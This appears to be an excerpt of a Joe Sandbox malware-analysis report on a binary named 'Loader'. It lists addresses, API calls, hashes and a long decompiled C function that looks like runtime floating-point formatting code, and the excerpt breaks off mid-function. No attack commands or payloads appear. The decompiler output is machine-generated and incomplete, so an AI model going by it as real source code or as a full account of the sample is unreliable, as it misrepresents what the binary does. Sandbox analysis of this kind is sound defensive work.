0x00afea0f
0x00afea22
0x00afea22
0x00afea03
0x00afe9ef
0x00afea28
0x00afeb64
0x00afeb64
0x00000000
0x00afea2e
0x00afea2e
0x00afea37
0x00afea48
0x00afea3e
0x00afea3e
0x00afea3e
0x00afea4f
0x00afea53
0x00000000
0x00afea77
0x00afea77
0x00afea7c
0x00afea7e
0x00afea7e
0x00afea80
0x00afea85
0x00afeb5f
0x00afeb61
0x00afeb66
0x00afeb6a
0x00afea8b
0x00afea8b
0x00afea8e
0x00afea8e
0x00afea96
0x00afea99
0x00afea99
0x00afea9c
0x00afea9c
0x00afea9f
0x00afeaa2
0x00afeaac
0x00afeab6
0x00afeabb
0x00afeac0
0x00afeb6b
0x00afeb6d
0x00afeb6e
0x00afeb6f
0x00afeb70
0x00afeb71
0x00afeb72
0x00afeb77
0x00afeb7b
0x00afeb83
0x00afeb8a
0x00afeb8d
0x00afeb8e
0x00afeb92
0x00afeb93
0x00afeb98
0x00afeba0
0x00afebaf
0x00afebbb
0x00afebcc
0x00afebd4
0x00afebee
0x00afebfb
0x00afebfe
0x00afec01
0x00afec01
0x00afec0b
0x00afebd6
0x00afebd6
0x00afebd8
0x00afebd8
0x00afec11
0x00afec12
0x00afec15
0x00afec1c
0x00afeac6
0x00afead6
0x00000000
0x00afeadc
0x00afeade
0x00afeade
0x00afeaea
0x00afeaf8
0x00000000
0x00afeafa
0x00afeafa
0x00afeafd
0x00afeb03
0x00afeb06
0x00afeb16
0x00afeb1b
0x00afeb29
0x00000000
0x00000000
0x00000000
0x00000000
0x00afeb08
0x00afeb08
0x00afeb0b
0x00afeb11
0x00afeb14
0x00afeb2b
0x00afeb2b
0x00afeb37
0x00afeb57
0x00000000
0x00afeb39
0x00afeb39
0x00afeb43
0x00afeb48
0x00afeb4d
0x00000000
0x00afeb4f
0x00000000
0x00afeb4f
0x00afeb4d
0x00000000
0x00000000
0x00000000
0x00afeb14
0x00afeb06
0x00afeaf8
0x00afead6
0x00afeac0
0x00afea85
0x00afea53

APIs

Part of subcall function 00AF4840: GetLastError.KERNEL32(?,00000000,?,00AED8CE,00000000,00000000,?,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF4845
Part of subcall function 00AF4840: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF48E3

GetACP.KERNEL32(?,?,?,?,?,?,00AF2699,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00AFEA3E
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00AF2699,?,?,?,00000055,?,-00000050,?,?), ref: 00AFEA69
_wcschr.LIBVCRUNTIME ref: 00AFEAFD
_wcschr.LIBVCRUNTIME ref: 00AFEB0B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00AFEBCC

Strings

utf8, xrefs: 00AFEB3B

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 3779503f29bf45b383f0ea17ab55cfad4b4d3b28ad065109fd89e6248b1d62b9
Instruction ID: d03c31ddffc839a978da152c9c8119597a6538018ba72cb53256bf1fee8d7c16
Opcode Fuzzy Hash: 3779503f29bf45b383f0ea17ab55cfad4b4d3b28ad065109fd89e6248b1d62b9
Instruction Fuzzy Hash: 5E71E671A0070AAADB24FBB5CC86BBB77A8FF44740F144469F706DB1A1EB74E9408761

Uniqueness

Uniqueness Score: -1.00%

Function 00AFFEAA Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00AFFEAA(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v464;
				void _v468;
				signed int _v472;
				char _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				intOrPtr _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1928;
				char _v1932;
				signed int _v1940;
				signed int _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2436;
				signed int _t797;
				intOrPtr _t807;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t826;
				signed int _t832;
				signed int _t834;
				signed int _t841;
				void* _t845;
				signed int _t846;
				intOrPtr _t852;
				void* _t853;
				signed int _t859;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t869;
				signed int _t871;
				signed int _t873;
				signed int _t874;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t883;
				signed int _t886;
				signed int _t889;
				signed int _t895;
				signed int _t896;
				signed int _t904;
				signed int _t907;
				signed int _t912;
				char* _t915;
				signed int _t919;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				char* _t934;
				signed char _t937;
				signed int _t943;
				signed int _t945;
				signed int _t949;
				signed int _t952;
				signed int _t960;
				signed int _t963;
				signed int _t965;
				signed int _t968;
				signed int _t977;
				signed int _t978;
				signed int _t981;
				signed int _t994;
				signed int _t995;
				signed int _t996;
				signed int _t997;
				signed int* _t998;
				signed char _t1001;
				signed int* _t1004;
				signed int _t1007;
				signed int _t1009;
				signed int _t1013;
				signed int _t1016;
				signed int _t1024;
				signed int _t1027;
				signed int _t1030;
				signed int _t1033;
				signed int _t1042;
				intOrPtr _t1047;
				signed int _t1048;
				signed int _t1054;
				void* _t1062;
				signed int _t1063;
				signed int _t1064;
				signed int _t1065;
				signed int _t1068;
				signed int _t1076;
				signed int _t1080;
				signed int _t1082;
				signed int _t1087;
				void* _t1093;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1099;
				signed int _t1104;
				signed int _t1105;
				signed int _t1109;
				signed int _t1111;
				signed int _t1116;
				signed char _t1123;
				void* _t1124;
				signed int _t1129;
				intOrPtr* _t1136;
				signed int _t1140;
				signed int _t1147;
				signed int _t1148;
				void* _t1150;
				signed int _t1153;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1160;
				signed int _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1168;
				signed int _t1169;
				signed int _t1170;
				signed int _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1177;
				signed int _t1178;
				signed int _t1179;
				signed int _t1181;
				signed int _t1182;
				unsigned int _t1183;
				unsigned int _t1187;
				unsigned int _t1190;
				signed int _t1191;
				signed int _t1194;
				signed int* _t1197;
				signed int _t1200;
				void* _t1202;
				unsigned int _t1203;
				signed int _t1204;
				signed int _t1207;
				signed int* _t1210;
				signed int _t1213;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				signed int _t1222;
				signed int _t1227;
				signed int _t1228;
				signed int _t1230;
				signed int _t1231;
				signed int _t1232;
				signed int _t1233;
				signed int _t1234;
				signed int _t1235;
				signed int _t1236;
				signed int _t1238;
				signed int _t1240;
				signed int _t1241;
				signed int _t1242;
				signed int _t1243;
				signed int _t1244;
				signed int _t1246;
				void* _t1247;
				signed int _t1248;
				signed int _t1250;
				signed int _t1255;
				void* _t1259;
				intOrPtr _t1260;
				void* _t1261;
				void* _t1264;
				unsigned int _t1267;
				signed int _t1268;
				signed int _t1269;
				signed int _t1270;
				signed int _t1271;
				signed int _t1272;
				signed int _t1273;
				signed int _t1276;
				signed int _t1277;
				signed int _t1278;
				signed int _t1279;
				signed int _t1282;
				signed int _t1283;
				signed int _t1284;
				void* _t1285;
				void* _t1288;
				signed int _t1290;
				signed int _t1294;
				signed int _t1296;
				signed int _t1300;
				void* _t1301;
				signed int _t1302;
				void* _t1303;
				signed int _t1305;
				signed int _t1306;
				signed int _t1308;
				void* _t1311;
				signed int _t1313;
				signed int _t1314;
				signed int _t1316;
				signed int _t1317;
				signed int _t1319;
				signed int _t1326;
				void* _t1328;
				signed int* _t1329;
				signed int* _t1331;
				signed int _t1334;
				signed int _t1343;

				_t1301 = __esi;
				_t1259 = __edi;
				_t1216 = __edx;
				_t797 =  *0xb36bac; // 0x85d5fe2b
				_v8 = _t797 ^ _t1326;
				_v1928 = _a16;
				_v1896 = _a20;
				_push(__ebx);
				E00B02CC9(__eflags,  &_v1940);
				_t1123 = 1;
				if((_v1940 & 0x0000001f) != 0x1f) {
					E00B02D31(__eflags,  &_v1940);
					_v1932 = 1;
				} else {
					_v1932 = 0;
				}
				_push(_t1301);
				_t1302 = _a8;
				_push(_t1259);
				_t1260 = 0x20;
				_t1334 = _t1302;
				if(_t1334 > 0 || _t1334 >= 0 && _a4 >= 0) {
					_t807 = _t1260;
				} else {
					_t807 = 0x2d;
				}
				_t1136 = _v1928;
				 *_t1136 = _t807;
				 *((intOrPtr*)(_t1136 + 8)) = _v1896;
				E00AF3AD8( &_v1944, 0, 0);
				_t1329 = _t1328 + 0xc;
				if((_t1302 & 0x7ff00000) != 0) {
					L14:
					_t814 = E00AF5818( &_a4);
					_pop(_t1139);
					__eflags = _t814;
					if(_t814 != 0) {
						_t1139 = _v1928;
						 *((intOrPtr*)(_v1928 + 4)) = _t1123;
					}
					_t815 = _t814 - 1;
					__eflags = _t815;
					if(_t815 == 0) {
						_t816 = E00AF3B73(_v1896, _a24, "1#INF");
						__eflags = _t816;
						if(_t816 != 0) {
							goto L311;
						} else {
							_t1123 = 0;
							__eflags = 0;
							goto L308;
						}
					} else {
						_t832 = _t815 - 1;
						__eflags = _t832;
						if(_t832 == 0) {
							_push("1#QNAN");
							goto L12;
						} else {
							_t834 = _t832 - 1;
							__eflags = _t834;
							if(_t834 == 0) {
								_push("1#SNAN");
								goto L12;
							} else {
								__eflags = _t834 == 1;
								if(_t834 == 1) {
									_push("1#IND");
									goto L12;
								} else {
									_v1920 = _v1920 & 0x00000000;
									_a8 = _t1302 & 0x7fffffff;
									_t1343 = _a4;
									asm("fst qword [ebp-0x75c]");
									_t1305 = _v1884;
									_v1916 = _a12 + 1;
									_t1147 = _t1305 >> 0x14;
									_t841 = _t1147 & 0x000007ff;
									__eflags = _t841;
									if(_t841 != 0) {
										_t841 = 0;
										_t1217 = 0x100000;
										_t39 =  &_v1876;
										 *_t39 = _v1876 & 0;
										__eflags =  *_t39;
									} else {
										_t1217 = 0;
										_v1876 = _t1123;
									}
									_t1306 = _t1305 & 0x000fffff;
									_v1912 = _v1888 + _t841;
									asm("adc esi, edx");
									_t1148 = _t1147 & 0x000007ff;
									_v1868 = _v1876 + _t1148;
									E00B02D80(_t1148, _t1343);
									_push(_t1148);
									 *_t1329 = _t1343;
									_t845 = E00B02E90(_t1148);
									_t1150 = _t1148;
									_t846 = L00B03CC0(_t845, _t1123, _t1150, _t1217);
									_v1904 = _t846;
									_t1264 = 0x20;
									__eflags = _t846 - 0x7fffffff;
									if(_t846 == 0x7fffffff) {
										L25:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t846 - 0x80000000;
										if(_t846 == 0x80000000) {
											goto L25;
										}
									}
									_t1218 = _v1868;
									__eflags = _t1306;
									_v468 = _v1912;
									_v464 = _t1306;
									_t1153 = (0 | _t1306 != 0x00000000) + 1;
									_v1892 = _t1153;
									_v472 = _t1153;
									__eflags = _t1218 - 0x433;
									if(_t1218 < 0x433) {
										__eflags = _t1218 - 0x35;
										if(_t1218 == 0x35) {
											L96:
											__eflags = _t1306;
											_t209 =  &_v1884;
											 *_t209 = _v1884 & 0x00000000;
											__eflags =  *_t209;
											_t852 =  *((intOrPtr*)(_t1326 + 4 + (0 | _t1306 != 0x00000000) * 4 - 0x1d4));
											asm("bsr eax, eax");
											if( *_t209 == 0) {
												_t853 = 0;
												__eflags = 0;
											} else {
												_t853 = _t852 + 1;
											}
											__eflags = _t1264 - _t853 - _t1123;
											asm("sbb esi, esi");
											_t1308 =  ~_t1306 + _t1153;
											__eflags = _t1308 - 0x73;
											if(_t1308 <= 0x73) {
												_t1219 = _t1308 - 1;
												__eflags = _t1219 - 0xffffffff;
												if(_t1219 != 0xffffffff) {
													_t1285 = _t1219 - 1;
													while(1) {
														__eflags = _t1219 - _t1153;
														if(_t1219 >= _t1153) {
															_t1042 = 0;
															__eflags = 0;
														} else {
															_t1042 =  *(_t1326 + _t1219 * 4 - 0x1d0);
														}
														__eflags = _t1285 - _t1153;
														if(_t1285 >= _t1153) {
															_t1183 = 0;
															__eflags = 0;
														} else {
															_t1183 =  *(_t1326 + _t1219 * 4 - 0x1d4);
														}
														 *(_t1326 + _t1219 * 4 - 0x1d0) = _t1183 >> 0x0000001f | _t1042 + _t1042;
														_t1219 = _t1219 - 1;
														_t1285 = _t1285 - 1;
														__eflags = _t1219 - 0xffffffff;
														if(_t1219 == 0xffffffff) {
															goto L111;
														}
														_t1153 = _v472;
													}
												}
												L111:
												_v472 = _t1308;
											} else {
												_v1400 = _v1400 & 0x00000000;
												_v472 = _v472 & 0x00000000;
												E00AEFD75( &_v468, 0x1cc,  &_v1396, 0);
												_t1329 =  &(_t1329[4]);
											}
											_t1267 = 0x434 >> 5;
											E00AEA8E0(0x434 >> 5,  &_v1396, 0, 0x434);
											__eflags = 1;
											 *(_t1326 + 0xbad63d) = 1 << (0x00000434 - _v1868 & 0x0000001f);
										} else {
											_v1396 = _v1396 & 0x00000000;
											_v1392 = 0x100000;
											_v1400 = 2;
											__eflags = _t1306;
											if(_t1306 != 0) {
												_t1247 = 0;
												__eflags = 0;
												while(1) {
													_t1047 =  *((intOrPtr*)(_t1326 + _t1247 - 0x570));
													__eflags = _t1047 -  *((intOrPtr*)(_t1326 + _t1247 - 0x1d0));
													if(_t1047 !=  *((intOrPtr*)(_t1326 + _t1247 - 0x1d0))) {
														goto L96;
													}
													_t1247 = _t1247 + 4;
													__eflags = _t1247 - 8;
													if(_t1247 != 8) {
														continue;
													} else {
														__eflags = 0;
														asm("bsr eax, esi");
														_v1884 = 0;
														if(0 == 0) {
															_t1048 = 0;
														} else {
															_t1048 = _t1047 + 1;
														}
														__eflags = _t1264 - _t1048 - 2;
														asm("sbb esi, esi");
														_t1319 =  ~_t1306 + _t1153;
														__eflags = _t1319 - 0x73;
														if(_t1319 <= 0x73) {
															_t1248 = _t1319 - 1;
															__eflags = _t1248 - 0xffffffff;
															if(_t1248 != 0xffffffff) {
																_t1288 = _t1248 - 1;
																while(1) {
																	__eflags = _t1248 - _t1153;
																	if(_t1248 >= _t1153) {
																		_t1054 = 0;
																	} else {
																		_t1054 =  *(_t1326 + _t1248 * 4 - 0x1d0);
																	}
																	__eflags = _t1288 - _t1153;
																	if(_t1288 >= _t1153) {
																		_t1187 = 0;
																	} else {
																		_t1187 =  *(_t1326 + _t1248 * 4 - 0x1d4);
																	}
																	 *(_t1326 + _t1248 * 4 - 0x1d0) = _t1187 >> 0x0000001e | _t1054 << 0x00000002;
																	_t1248 = _t1248 - 1;
																	_t1288 = _t1288 - 1;
																	__eflags = _t1248 - 0xffffffff;
																	if(_t1248 == 0xffffffff) {
																		goto L94;
																	}
																	_t1153 = _v472;
																}
															}
															L94:
															_v472 = _t1319;
														} else {
															_v1400 = 0;
															_v472 = 0;
															E00AEFD75( &_v468, 0x1cc,  &_v1396, 0);
															_t1329 =  &(_t1329[4]);
														}
														_t1267 = 0x435 >> 5;
														E00AEA8E0(0x435 >> 5,  &_v1396, 0, 0x435);
														 *(_t1326 + 0xbad63d) = 1 << (0x00000435 - _v1868 & 0x0000001f);
													}
													goto L113;
												}
											}
											goto L96;
										}
										L113:
										_t859 = _t1267 + 1;
										_t1311 = 0x1cc;
										_v1400 = _t859;
										_v936 = _t859;
										E00AEFD75( &_v932, 0x1cc,  &_v1396, _t859 << 2);
										_t1331 =  &(_t1329[7]);
										_t1123 = 1;
										__eflags = 1;
									} else {
										_v1396 = _v1396 & 0x00000000;
										_v1392 = 0x100000;
										_v1400 = 2;
										__eflags = _t1306;
										if(_t1306 == 0) {
											L53:
											_t1190 = _t1218 - 0x432;
											_t1191 = _t1190 & 0x0000001f;
											_v1900 = _t1190 >> 5;
											_v1876 = _t1191;
											_v1920 = _t1264 - _t1191;
											_t1062 = E00B03AF0(_t1123, _t1264 - _t1191, 0);
											_t1250 = _v1892;
											_t1063 = _t1062 - 1;
											_t128 =  &_v1872;
											 *_t128 = _v1872 & 0x00000000;
											__eflags =  *_t128;
											_v1912 = _t1063;
											_t1064 =  !_t1063;
											_v1884 = _t1064;
											asm("bsr eax, ecx");
											if( *_t128 == 0) {
												_t136 =  &_v1880;
												 *_t136 = _v1880 & 0x00000000;
												__eflags =  *_t136;
											} else {
												_v1880 = _t1064 + 1;
											}
											_t1194 = _v1900;
											_t1311 = 0x1cc;
											_t1065 = _t1250 + _t1194;
											__eflags = _t1065 - 0x73;
											if(_t1065 <= 0x73) {
												__eflags = _t1264 - _v1880 - _v1876;
												asm("sbb eax, eax");
												_t1068 =  ~_t1065 + _t1250 + _t1194;
												_v1908 = _t1068;
												__eflags = _t1068 - 0x73;
												if(_t1068 > 0x73) {
													goto L57;
												} else {
													_t1290 = _t1194 - 1;
													_t1076 = _t1068 - 1;
													_v1872 = _t1290;
													_v1868 = _t1076;
													__eflags = _t1076 - _t1290;
													if(_t1076 != _t1290) {
														_t1294 = _t1076 - _t1194;
														__eflags = _t1294;
														_t1197 =  &(( &_v472)[_t1294]);
														_v1892 = _t1197;
														while(1) {
															__eflags = _t1294 - _t1250;
															if(_t1294 >= _t1250) {
																_t1080 = 0;
																__eflags = 0;
															} else {
																_t1080 = _t1197[1];
															}
															_v1880 = _t1080;
															_t156 = _t1294 - 1; // -4
															__eflags = _t156 - _t1250;
															if(_t156 >= _t1250) {
																_t1082 = 0;
																__eflags = 0;
															} else {
																_t1082 =  *_t1197;
															}
															_t1200 = _v1868;
															 *(_t1326 + _t1200 * 4 - 0x1d0) = (_t1082 & _v1884) >> _v1920 | (_v1880 & _v1912) << _v1876;
															_t1087 = _t1200 - 1;
															_t1197 = _v1892 - 4;
															_v1868 = _t1087;
															_t1294 = _t1294 - 1;
															_v1892 = _t1197;
															__eflags = _t1087 - _v1872;
															if(_t1087 == _v1872) {
																break;
															}
															_t1250 = _v472;
														}
														_t1194 = _v1900;
													}
													__eflags = _t1194;
													if(_t1194 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1194 << 2);
														_t1329 =  &(_t1329[3]);
													}
													_v472 = _v1908;
												}
											} else {
												L57:
												_v1400 = 0;
												_v472 = 0;
												E00AEFD75( &_v468, _t1311,  &_v1396, 0);
												_t1329 =  &(_t1329[4]);
											}
											_v1396 = 2;
											_push(4);
										} else {
											_t1202 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1326 + _t1202 - 0x570)) -  *((intOrPtr*)(_t1326 + _t1202 - 0x1d0));
												if( *((intOrPtr*)(_t1326 + _t1202 - 0x570)) !=  *((intOrPtr*)(_t1326 + _t1202 - 0x1d0))) {
													goto L53;
												}
												_t1202 = _t1202 + 4;
												__eflags = _t1202 - 8;
												if(_t1202 != 8) {
													continue;
												} else {
													_t1203 = _t1218 - 0x431;
													_t1204 = _t1203 & 0x0000001f;
													_v1880 = _t1203 >> 5;
													_v1900 = _t1204;
													_v1872 = _t1264 - _t1204;
													_t1093 = E00B03AF0(_t1123, _t1264 - _t1204, 0);
													_t1255 = _v1892;
													_t1094 = _t1093 - 1;
													_t68 =  &_v1884;
													 *_t68 = _v1884 & 0x00000000;
													__eflags =  *_t68;
													_v1908 = _t1094;
													_t1095 =  !_t1094;
													_v1912 = _t1095;
													asm("bsr eax, ecx");
													if( *_t68 == 0) {
														_t76 =  &_v1876;
														 *_t76 = _v1876 & 0x00000000;
														__eflags =  *_t76;
													} else {
														_v1876 = _t1095 + 1;
													}
													_t1207 = _v1880;
													_t1311 = 0x1cc;
													_t1096 = _t1255 + _t1207;
													__eflags = _t1096 - 0x73;
													if(_t1096 <= 0x73) {
														__eflags = _t1264 - _v1876 - _v1900;
														asm("sbb eax, eax");
														_t1099 =  ~_t1096 + _t1255 + _t1207;
														_v1884 = _t1099;
														__eflags = _t1099 - 0x73;
														if(_t1099 > 0x73) {
															goto L35;
														} else {
															_t1296 = _t1207 - 1;
															_t1105 = _t1099 - 1;
															_v1920 = _t1296;
															_v1868 = _t1105;
															__eflags = _t1105 - _t1296;
															if(_t1105 != _t1296) {
																_t1300 = _t1105 - _t1207;
																__eflags = _t1300;
																_t1210 =  &(( &_v472)[_t1300]);
																_v1892 = _t1210;
																while(1) {
																	__eflags = _t1300 - _t1255;
																	if(_t1300 >= _t1255) {
																		_t1109 = 0;
																		__eflags = 0;
																	} else {
																		_t1109 = _t1210[1];
																	}
																	_v1876 = _t1109;
																	_t96 = _t1300 - 1; // -4
																	__eflags = _t96 - _t1255;
																	if(_t96 >= _t1255) {
																		_t1111 = 0;
																		__eflags = 0;
																	} else {
																		_t1111 =  *_t1210;
																	}
																	_t1213 = _v1868;
																	 *(_t1326 + _t1213 * 4 - 0x1d0) = (_t1111 & _v1912) >> _v1872 | (_v1876 & _v1908) << _v1900;
																	_t1116 = _t1213 - 1;
																	_t1210 = _v1892 - 4;
																	_v1868 = _t1116;
																	_t1300 = _t1300 - 1;
																	_v1892 = _t1210;
																	__eflags = _t1116 - _v1920;
																	if(_t1116 == _v1920) {
																		break;
																	}
																	_t1255 = _v472;
																}
																_t1207 = _v1880;
															}
															__eflags = _t1207;
															if(_t1207 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1207 << 2);
																_t1329 =  &(_t1329[3]);
															}
															_v472 = _v1884;
														}
													} else {
														L35:
														_v1400 = 0;
														_v472 = 0;
														E00AEFD75( &_v468, _t1311,  &_v1396, 0);
														_t1329 =  &(_t1329[4]);
													}
													_t1104 = 4;
													_v1396 = _t1104;
													_push(_t1104);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_v1392 = _v1392 & 0x00000000;
										_push( &_v1396);
										_v936 = _t1123;
										_push(_t1311);
										_push( &_v932);
										_v1400 = _t1123;
										E00AEFD75();
										_t1331 =  &(_t1329[4]);
									}
									_t864 = _v1904;
									_t1155 = 0xa;
									_v1912 = _t1155;
									__eflags = _t864;
									if(_t864 < 0) {
										_t865 =  ~_t864;
										_t866 = _t865 / _t1155;
										_v1892 = _t866;
										_t1156 = _t865 % _t1155;
										_v1920 = _t1156;
										__eflags = _t866;
										if(_t866 == 0) {
											L246:
											__eflags = _t1156;
											if(_t1156 != 0) {
												_t912 =  *(0xb093d4 + _t1156 * 4);
												_v1884 = _t912;
												__eflags = _t912;
												if(_t912 == 0) {
													L258:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L259;
												} else {
													__eflags = _t912 - _t1123;
													if(_t912 != _t1123) {
														_t1166 = _v472;
														__eflags = _t1166;
														if(_t1166 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1273 = 0;
															__eflags = 0;
															do {
																_t1232 = _t912 *  *(_t1326 + _t1273 * 4 - 0x1d0) >> 0x20;
																 *(_t1326 + _t1273 * 4 - 0x1d0) = _t912 *  *(_t1326 + _t1273 * 4 - 0x1d0) + _v1872;
																_t912 = _v1884;
																asm("adc edx, 0x0");
																_t1273 = _t1273 + 1;
																_v1872 = _t1232;
																__eflags = _t1273 - _t1166;
															} while (_t1273 != _t1166);
															__eflags = _t1232;
															if(_t1232 != 0) {
																_t919 = _v472;
																__eflags = _t919 - 0x73;
																if(_t919 >= 0x73) {
																	goto L258;
																} else {
																	 *(_t1326 + _t919 * 4 - 0x1d0) = _t1232;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t866 - 0x26;
												if(_t866 > 0x26) {
													_t866 = 0x26;
												}
												_t1167 =  *(0xb0933e + _t866 * 4) & 0x000000ff;
												_v1900 = _t866;
												_v1400 = ( *(0xb0933e + _t866 * 4) & 0x000000ff) + ( *(0xb0933f + _t866 * 4) & 0x000000ff);
												E00AEA8E0(_t1167 << 2,  &_v1396, 0, _t1167 << 2);
												_t930 = E00AEA360( &(( &_v1396)[_t1167]), 0xb08a38 + ( *(0xb0933c + _v1900 * 4) & 0x0000ffff) * 4, ( *(0xb0933f + _t866 * 4) & 0x000000ff) << 2);
												_t1276 = _v1400;
												_t1331 =  &(_t1331[6]);
												__eflags = _t1276 - _t1123;
												if(_t1276 > _t1123) {
													__eflags = _v472 - _t1123;
													if(_v472 > _t1123) {
														__eflags = _t1276 - _v472;
														_t1233 =  &_v1396;
														_t548 = _t1276 - _v472 > 0;
														__eflags = _t548;
														_t931 = _t930 & 0xffffff00 | _t548;
														if(_t548 >= 0) {
															_t1233 =  &_v468;
														}
														_v1876 = _t1233;
														_t1168 =  &_v468;
														__eflags = _t931;
														if(_t931 == 0) {
															_t1168 =  &_v1396;
														}
														_v1872 = _t1168;
														__eflags = _t931;
														if(_t931 == 0) {
															_t1169 = _v472;
															_v1880 = _t1169;
														} else {
															_t1169 = _t1276;
															_v1880 = _t1276;
														}
														__eflags = _t931;
														if(_t931 != 0) {
															_t1276 = _v472;
														}
														_t932 = 0;
														_t1313 = 0;
														_v1864 = 0;
														__eflags = _t1169;
														if(_t1169 == 0) {
															L240:
															_v472 = _t932;
															_t1311 = 0x1cc;
															_t933 = _t932 << 2;
															__eflags = _t933;
															_push(_t933);
															_t934 =  &_v1860;
															goto L241;
														} else {
															do {
																__eflags =  *(_t1233 + _t1313 * 4);
																if( *(_t1233 + _t1313 * 4) != 0) {
																	_t1236 = 0;
																	_t1170 = _t1313;
																	_v1868 = _v1868 & 0;
																	_v1908 = 0;
																	__eflags = _t1276;
																	if(_t1276 == 0) {
																		L237:
																		__eflags = _t1170 - 0x73;
																		if(_t1170 == 0x73) {
																			goto L255;
																		} else {
																			_t1169 = _v1880;
																			_t1233 = _v1876;
																			goto L239;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1170 - 0x73;
																			if(_t1170 == 0x73) {
																				goto L232;
																			}
																			__eflags = _t1170 - _t932;
																			if(_t1170 == _t932) {
																				 *(_t1326 + _t1170 * 4 - 0x740) =  *(_t1326 + _t1170 * 4 - 0x740) & 0x00000000;
																				_t952 = _v1868 + 1 + _t1313;
																				__eflags = _t952;
																				_v1864 = _t952;
																			}
																			_t945 =  *(_v1872 + _v1868 * 4);
																			_t1238 = _v1876;
																			_t1236 = _t945 *  *(_t1238 + _t1313 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1326 + _t1170 * 4 - 0x740) =  *(_t1326 + _t1170 * 4 - 0x740) + _t945 *  *(_t1238 + _t1313 * 4) + _v1908;
																			asm("adc edx, 0x0");
																			_t949 = _v1868 + 1;
																			_t1170 = _t1170 + 1;
																			_v1868 = _t949;
																			__eflags = _t949 - _t1276;
																			_v1908 = _t1236;
																			_t932 = _v1864;
																			if(_t949 != _t1276) {
																				continue;
																			} else {
																				goto L232;
																			}
																			while(1) {
																				L232:
																				__eflags = _t1236;
																				if(_t1236 == 0) {
																					goto L237;
																				}
																				__eflags = _t1170 - 0x73;
																				if(_t1170 == 0x73) {
																					L255:
																					_t1311 = 0x1cc;
																					goto L256;
																				} else {
																					__eflags = _t1170 - _t932;
																					if(_t1170 == _t932) {
																						_t604 = _t1326 + _t1170 * 4 - 0x740;
																						 *_t604 =  *(_t1326 + _t1170 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t604;
																						_t610 = _t1170 + 1; // 0x1
																						_v1864 = _t610;
																					}
																					_t943 = _t1236;
																					_t1236 = 0;
																					 *(_t1326 + _t1170 * 4 - 0x740) =  *(_t1326 + _t1170 * 4 - 0x740) + _t943;
																					_t932 = _v1864;
																					asm("adc edx, edx");
																					_t1170 = _t1170 + 1;
																					continue;
																				}
																				goto L243;
																			}
																			goto L237;
																		}
																		goto L232;
																	}
																} else {
																	__eflags = _t1313 - _t932;
																	if(_t1313 == _t932) {
																		 *(_t1326 + _t1313 * 4 - 0x740) =  *(_t1326 + _t1313 * 4 - 0x740) & 0x00000000;
																		_t567 = _t1313 + 1; // 0x1
																		_t932 = _t567;
																		_v1864 = _t932;
																	}
																	goto L239;
																}
																goto L243;
																L239:
																_t1313 = _t1313 + 1;
																__eflags = _t1313 - _t1169;
															} while (_t1313 != _t1169);
															goto L240;
														}
													} else {
														_t1311 = 0x1cc;
														_v1872 = _v468;
														_v472 = _t1276;
														E00AEFD75( &_v468, 0x1cc,  &_v1396, _t1276 << 2);
														_t960 = _v1872;
														_t1331 =  &(_t1331[4]);
														__eflags = _t960;
														if(_t960 != 0) {
															__eflags = _t960 - _t1123;
															if(_t960 == _t1123) {
																goto L242;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L242;
																} else {
																	_v1884 = _v472;
																	_t1172 = 0;
																	_t1277 = 0;
